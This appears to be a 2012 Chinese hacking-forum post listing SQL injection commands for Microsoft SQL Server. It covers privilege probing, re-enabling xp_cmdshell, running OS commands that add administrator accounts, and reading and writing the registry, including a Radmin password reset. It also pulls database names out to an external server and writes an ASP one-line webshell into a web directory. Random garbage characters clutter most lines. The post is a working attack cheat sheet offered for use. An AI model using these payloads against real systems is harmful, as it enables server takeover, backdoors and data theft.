找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2284|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
9 s2 ~# M  s1 D" y. e; T//看看是什么权限的" v; H0 H! [- u+ |+ l
and 1=(Select IS_MEMBER('db_owner'))$ `+ F0 E% ?: r% \/ y$ @
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--8 k& _5 }- o: |3 Y, k9 V5 ?: i3 V5 P
& F" ?/ [. u0 I
//检测是否有读取某数据库的权限* Q7 P, `5 ]- J
and 1= (Select HAS_DBACCESS('master'))
) m) `" T9 G2 r" b. LAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --9 v; D' [! X# r' w
' J7 A7 X2 J# K1 K3 q0 P
( V. N9 d, m! S0 Y) \7 L# \
数字类型: x0 N  Q+ s# k$ v7 C
and char(124)%2Buser%2Bchar(124)=0
+ f0 M5 z. N0 r% u
+ i3 [4 u) W. j' {4 {  U字符类型% t$ n& p* A8 X
' and char(124)%2Buser%2Bchar(124)=0 and ''='5 X9 \2 b  e# Q; ?0 N, X1 ~% Y
$ l* z1 W- B& N, v" e: D0 B
搜索类型
7 ^! \0 o0 R) F) [5 g! j! K9 c' R2 Q7 i' and char(124)%2Buser%2Bchar(124)=0 and '%'='! s% N2 w' S9 X* Y9 r

; w: L! L5 w8 z: m9 i- E7 C爆用户名1 u, o" J. u3 e4 z8 e  g& Z0 i
and user>0  r- }( l4 q! E, I
' and user>0 and ''='2 }6 G7 r0 p) |. C8 B5 ?
9 R( X5 o) d' W& r" ?. ]" _
检测是否为SA权限
8 Y; S: z1 r6 T! I1 Uand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
5 x2 h, X2 B8 m1 LAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
; j+ r2 a+ \1 V) ~2 T0 D
) f2 Y6 S# c6 }5 n3 p- V9 h4 n检测是不是MSSQL数据库+ E5 ]( Y, W& u- P2 C
and exists (select * from sysobjects);--
+ K) y0 K4 n& N  b- p/ r
" g1 U( ^; m, L/ j3 {" E8 Q- C检测是否支持多行0 Y1 t+ Y- t3 V: _
;declare @d int;--
& |/ z  ~, M9 x9 f' N: B
, J% p* g  o' j7 |0 U) c9 k恢复 xp_cmdshell
9 n& R. Q0 w! N7 X;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
& y7 `: i4 @: Z* N. H, e) {0 A- F6 m5 v4 B3 j5 p# q
) W1 e) j! h; _9 Z, S3 S
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') * U. ?6 _6 _1 N/ c4 L  ]0 }

% c4 X2 f, E$ g, ?5 r  ]//-----------------------
2 k( U3 {# X1 h4 S5 E: b3 q0 ?9 p//      执行命令
  k  T! Q2 K- W/ C& I//-----------------------& r9 n* r' d& ~1 S! S
首先开启沙盘模式:# R+ y5 o3 Z. ]3 }) ^
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',19 w: `  {4 n# g' `% s
: \5 m8 F: S% P, v- w; ^" C0 |6 W
然后利用jet.oledb执行系统命令1 O4 a) \. C; c6 O' g+ a" e& U' O
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')' j* U" ~; L& u. B
7 T: r  z5 p% y* G) C2 b8 t' o; X
执行命令
6 @/ O. b5 U1 ^: Z) y2 M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--$ Y; X+ w3 o! T; W

1 s- ]- L9 J/ d; M/ N, uEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'2 J8 L7 f6 e! g/ \8 g4 D) b  @
; e* B1 d7 z: U8 S( p+ g
判断xp_cmdshell扩展存储过程是否存在:$ C6 h& `1 @; \
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')% E# _6 u' Q& E, i0 Y1 `. C9 z

' i: U8 e" T/ ]写注册表
& s7 C; b5 U% }# \8 s1 fexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" m& v3 N9 x5 S  d

5 X& P* J# _$ L: o0 SREG_SZ! a1 E" X, t" Q$ e& |" O+ ~
5 D% T, H* h" r
读注册表
7 L4 ?% w  f1 D7 d' |/ q5 ?exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'' R; C- f, p. v  W" z& V/ o
. x! R! N: d6 V& r
读取目录内容; R, \4 W' K" ~
exec master..xp_dirtree 'c:\winnt\system32\',1,1
! R9 _- Z3 j9 i- K" ^9 _! P" U4 j) c+ N8 ^. s5 Y

2 E  F- _1 c6 h数据库备份
; I% a4 F% n1 y9 Cbackup database pubs to disk = 'c:\123.bak'
! t. [4 ^' ?% f; U( b" s$ x# R1 U# R3 }) z- r
//爆出长度
8 a0 J4 L. S# b/ i! ~9 |% V! uAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% M, H! X" j4 c9 u- ~; T+ \
* ^1 }# d& q5 G; P  w  D
( [7 ?: H" a/ ]6 G+ _8 C% x
- T. Q/ k0 d, m2 J( D/ z更改sa口令方法:用sql综合利用工具连接后,执行命令:0 \1 W: G3 O, A$ y  a) {( X. b
exec sp_password NULL,'新密码','sa'# l9 {8 N( x# t& k0 G0 c) d% R

" M+ @* e6 J$ D( B添加和删除一个SA权限的用户test:
5 l; A8 `! \# \3 Q/ X: X) o" R) }exec master.dbo.sp_addlogin test,ptlove
" Z3 C1 \# E5 N% S0 eexec master.dbo.sp_addsrvrolemember test,sysadmin$ {7 n' ^+ U3 d" N* ?( N0 h

: i* p. J9 ~/ L- m. e删除扩展存储过过程xp_cmdshell的语句:
1 f' u4 o0 Q$ \! qexec sp_dropextendedproc 'xp_cmdshell'
* ^8 \7 R; |5 Y! a8 |& ?6 i
4 v  ]; U8 u! C添加扩展存储过过程0 |0 z; w1 n/ ^1 Z
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' - f6 h8 K" v( n, D' F' B) i! X
GRANT exec On xp_proxiedadata TO public
/ z! D. C6 k+ h4 `. O) [) n  I  [

8 F0 V0 t  S3 K" B. L停掉或激活某个服务。
; U; |2 u% q+ O' W/ G1 ]1 _! W
0 b/ \- z* H) k0 t% j' iexec master..xp_servicecontrol 'stop','schedule'
' o6 U0 M; j7 Z  sexec master..xp_servicecontrol 'start','schedule'; z% `* z7 r" u7 t& K/ L4 R: k, G

/ s# L, {* v9 Qdbo.xp_subdirs) Q3 Y% T- U! h* J: J/ y

; X1 D" z& M7 _/ m( z8 x只列某个目录下的子目录。; y  k2 |4 l  u
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'$ n9 h1 a) ~- j' v8 m( K

- \/ P: R) N2 x0 s1 Ydbo.xp_makecab! ^7 t3 H# ~  r, H

4 w2 e) p2 C4 U) A将目标多个档案压缩到某个目标档案之内。
6 h' W0 Y, B  b. _9 w所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。0 z4 C' i3 x* R, i. W+ x9 M

1 P- U& y& d1 Q* Y7 O) l6 w6 e) ~dbo.xp_makecab2 a& z7 R/ b9 o8 X
'c:\test.cab','mszip',1,
  l1 R+ j% }) Z" Z1 c'C:\Inetpub\wwwroot\SQLInject\login.asp',
( N" \/ m3 i/ l# X'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
( }3 Y* o4 x/ T- q. u) U$ {/ E0 q5 k' Q! v8 b" Y. P! q/ v+ }, z
xp_terminate_process9 Q6 x- M& Y) ?# D: ]" J
$ _- \$ G, ~; {4 ]
停掉某个执行中的程序,但赋予的参数是 Process ID。
9 M4 W7 t& x% c8 z/ J利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID0 |, A  y& ^+ l1 E6 I1 O" I/ k* ^5 }
$ }! B8 @  Y6 U4 y' t
xp_terminate_process 2484
* B% c" f& y$ j! o1 j. N3 L( @" R: L
xp_unpackcab
: I" e$ s! ^# t1 x
4 I" B4 E' c8 e6 h8 W/ W解开压缩档。
# L1 J' \" P4 f+ d) q, i' H3 d+ I: V7 @( a; s5 ]' ~8 H
xp_unpackcab 'c:\test.cab','c:\temp',1
/ K% Z; M9 y7 u0 c9 E8 j3 u4 C6 P; v

* F0 u7 K) e/ U某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234- {" Z  r9 B! {; `% G

+ R5 r0 d5 f  O% G$ `4 @create database lcx;
: k( _3 i5 z4 G3 z3 j: ICreate TABLE ku(name nvarchar(256) null);6 ^/ a6 ^1 |3 a- N4 f. N
Create TABLE biao(id int NULL,name nvarchar(256) null);* u. h4 K& X( S3 q
4 y3 U; B( E, }
//得到数据库名7 g: _# u, E0 \- F: n3 j
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases: V8 e% V: Y4 D5 u: M: E
$ M5 u7 ~0 K9 y7 H$ ]$ a

6 A: m8 M) _, E: [7 Y//在Master中创建表,看看权限怎样) ~" W8 w& x' F9 ?% g" I4 V9 h0 ^6 a
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
8 q' _# I* |3 S4 C
# H+ T" c% Q8 T1 ^4 Q- e2 c: ~$ c用 sp_makewebtask直接在web目录里写入一句话马:
7 {6 P" V0 W2 d) I4 h$ b* |7 ahttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--7 k, `( ~/ W* q; r% U, G

' u- P, [, d) d5 P//更新表内容5 n3 l3 m! ~' h4 r3 e
Update films SET kind = 'Dramatic' Where id = 123
) K% [9 y! _; o+ J4 ~1 U& F$ C6 h+ m- X9 A2 m, i
//删除内容
5 `9 x' ^' |& v" ]5 _- Z. ddelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表